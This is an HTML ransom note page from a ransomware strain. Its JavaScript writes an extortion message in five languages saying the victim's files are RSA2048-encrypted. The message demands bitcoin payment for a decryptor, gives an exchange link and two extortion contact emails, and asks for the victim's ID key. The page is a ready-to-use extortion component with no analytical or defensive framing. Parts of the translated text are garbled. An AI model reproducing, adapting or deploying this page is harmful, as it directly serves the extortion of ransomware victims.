<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>RANSOMWARE</title>
<style type="text/css">
.btn {
  background: #1E90FF;
  border-radius: 0px;
  font-family: tahoma;
  font-weight:bold;
  color: #fff;
  font-size: 8px;
  padding: 4px 14px 4px 14px;
  text-decoration: none;
}
.btn:hover {
  background: #515154;
  text-decoration: none;
}
 
.col {
    background: #2e2f37;
    width: 60%;
    padding: 15px;
    color:#ffffff;
    font-size: 0.5em;
    word-wrap: break-word;
    text-align: center
}
body {  min-width: 100px;}#container{background:#1E90FF;}#container .column{position:relative; float:center;}#center{padding:10px 10px;width:100%;}#footer{clear:both;}* html #left {left:150px;}* html body{overflow:hidden;}* html #footer-wrapper{float:left;position: relative;width: 100%;padding-bottom:10010px;margin-bottom:-10000px;background:#1E90FF;}body {margin: 0;padding: 0;font-family:tahoma;font-weight:bold;}#header {font-family:tahoma;font-weight:bold;padding: 1.0em;background: #232326;}#footer {font-size: large;font-family:impact;line-height: 0.1px;padding: 1.0em;background: #232326;}#center {background: #515154;}</style></head><body style="background-color:#232326;">
 
<object align="right">
<font size="3" color="#1E90FF">Language:</font>
<a href="?EN">EN</a href>
<a href="?DE">DE</a href>
<a href="?FR">FR</a href>
<a href="?IT">IT</a href>
<a href="?ES">ES</a href>
&nbsp;
</object>
<header id="header" style="
    margin-bottom: 0px;
">
<font s
<font size="6" color="#1E90FF"><p align="center"> <font color="EE0000"> </font>  </p>
</font>
</header>
<center>
<div id="container">
<main id="center" class="column">
<article>
<p align="center">
<font color="EE0000" size ="6">
<script>
var cUrl = document.URL;
if(cUrl.indexOf("?DE") !== -1){
document.write("Alle Ihre wichtigen Dateien sind chiffriert");
};
if(cUrl.indexOf("?FR") !== -1){
document.write("Tous vos importants fichiers sont chiffr?s");
};
if(cUrl.indexOf("?ES") !== -1){
document.write("Todos sus ficheros importantes son cifrados");
};
if(cUrl.indexOf("?IT") !== -1){
document.write("Tutti i Suoi file importanti sono encrypted");
};
if(cUrl.indexOf("?EN") !== -1 || cUrl.indexOf("?") == -1){
document.write("All your important files are encrypted");
};
</script></font></p><font color="#E6E6FA" size="4" weight="lighter"><p align="center">
 
<script>
var cUrl = document.URL;
var key = "<div align=\'center\'><font color=\"#E8FF8F\">IDKEY:</font><font color=\'#000000\'><div class=\'col'\>${CODE}</div></font></div><font color=\'#00FF00\'>";
var a1 = "<p align=\"center\">";
var link = "<a href='https://www.bestbitcoinexchange.io/'>bestbitcoinexchange.io</a>"
if(cUrl.indexOf("?DE") !== -1){
document.write("Ihre  Dateien  waren  mit  Hilfe  RSA2048  des  Algorithmus  chiffriert. </p>"+a1+" Wie die Dateien wieder herzustellen: sich mit uns zu verbinden, zu bezahlen, die <font color=\"#ffffff\">Dekodier einrichtung</font> zu bekommen.</p>"+a1+"Wir ?bernehmen zur Bezahlung bitcoin.</p>"+a1+"Sie k?nnen die Wechselstellen auf finden <a href>https://www.bitcoin.com/buy-bitcoin</a> und anderer.</p>"+a1+"Sie haben einen idkey (in einer gelben Box), senden Sie es uns in einem brief</p>"+a1+"Ebenso k?nnen Sie 1 Dateien f?r die Pr?fungsentzifferung absenden.</p>"+key+a1+"Die Kontaktinformationen:</p>");
};              
if(cUrl.indexOf("?FR") !== -1){
document.write("Vos fichiers ?taient chiffr?s avec l'aide de RSA2048 de l'algorithme.</p>"+a1+"Comme r?cup?rer les fichiers : nous contacter, payer, recevoir le <font color=\"#ffffff\">d?codeur.</font>"+a1+"Sont accept?s au paiement bitcoin.</p>"+a1+"Vous pouvez trouver les bureaux de change sur "+link+".</p>"+a1+"Vous avez une idkey (dans le tableau jaune) envoyez-la nous dans une lettre</p>"+a1+"Vous pouvez ?galement envoyer 1 fichier pour le d?codage de test, ce qui garantit que nous avons un d?codeur.</p>"+key+a1+"L\'information de contact:");
};
if(cUrl.indexOf("?ES") !== -1){
document.write("Sus ficheros eran cifrados por medio de RSA2048 del algoritmo. </p>"+a1+"Como restablecer los ficheros: comunicarnos con, cifrati per mezzo di el <font color=\"#ffffff\">decodificador.</font>"+a1+"Se pone de pago bitcoin. Pod?is encontrar las oficinas de cambio en "+link+"."+a1+"</p>"+a1+"Tienes una idkey (en un cuadro amarillo) env?anosla en una carta</p>"+a1+"Puede enviar 1 archivo para decodificar la prueba. Esto asegura que tenemos un decodificador</p>"+key+a1+"La informaci?n de contacto:");
};
if(cUrl.indexOf("?IT") !== -1){
document.write("I Suoi file sono stati cifrati per mezzo di algoritmo RSA2048.</p>"+a1+"Come restaurare file: per contattarci, pagare, ricevono il <font color=\"#ffffff\">decodificatore.</font>"+a1+"Per pagamento il bitcoin ? accettato</p>"+a1+"Pu? trovare uffici di cambio in "+link+"  e altri.</p>"+a1+"Hai la tua id key (in una scatola gialla) inviarlo a noi in una lettera</p>"+a1+"Puoi anche inviare 1 file per la decodifica, che garantisce la presenza di un decoder in noi"+key+a1+"Contatti informazioni:");
};
if(cUrl.indexOf("?EN") !== -1 || cUrl.indexOf("?") == -1){
document.write("Your files has been encrypted using RSA2048 algorithm with unique public-key stored on your PC.</p>"+a1+"There is&nbsp;&nbsp;only one way&nbsp;&nbsp; to get your files back:&nbsp;&nbsp;contact with us,&nbsp;&nbsp;pay,&nbsp;&nbsp;and get &nbsp;<font color=\"#ffffff\">decryptor software.</font>&nbsp;"+a1+"We accept Bitcoin, and other cryptocurrencies, &nbsp;you can find exchangers on "+link+"&nbsp;&nbsp;</p>"+a1+"You have unique idkey (in a yellow frame), write it in letter when contact with us.</p>"+a1+"Also you can decrypt 1 file for test, its guarantee what we can decrypt your files.</p>"+key+a1+"Contact information:</p>");
};
 
</script>
<p align="center">primary email:&nbspyoursalvations@protonmail.ch</p><p align="center">reserve email: neverdies@tutanota.com</p></font></article></main></div></center> <div id = "footer - wrapper"><footer id="footer"><header id="header"><font size="1" color="#1E90FF"></font></header></footer></div><audio autoplay preload="auto" style=" width:1px; "><source src="https://files.freemusicarchive.org/music%2FOddio_Overplay%2FJohn_Harrison_with_the_Wichita_State_University_Chamber_Players%2FThe_Four_Seasons_Vivaldi%2FJohn_Harrison_with_the_Wichita_State_University_Chamber_Players_-_01_-_Spring_Mvt_1_Allegro.mp3" type="audio//mpeg"></audio></br></body></html>
